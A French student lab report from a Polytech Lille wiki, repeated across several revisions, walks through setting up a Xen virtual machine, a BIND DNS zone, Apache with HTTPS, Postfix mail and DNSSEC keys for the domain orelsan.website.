Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
<b>Installation boite mail</b><br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
<b>Générer une demande de certificat en SHA 2</b><br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
<b> DNSSEC </b><br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35641TP sysres IMA2a5 2016/2017 G42016-12-06T09:09:38Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
<b>Installation boite mail</b><br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
<b>Générer une demande de certificat en SHA 2</b><br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
<b> DNSSEC </b><br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétriqu de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35637TP sysres IMA2a5 2016/2017 G42016-12-05T17:18:05Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
<b>Installation boite mail</b><br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
<b>Générer une demande de certificat en SHA 2</b><br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35636TP sysres IMA2a5 2016/2017 G42016-12-05T16:48:09Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
<b>Installation boite mail</b><br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
<b>Générer une demande de certificat en SHA 2</b><br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35635TP sysres IMA2a5 2016/2017 G42016-12-05T16:41:56Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
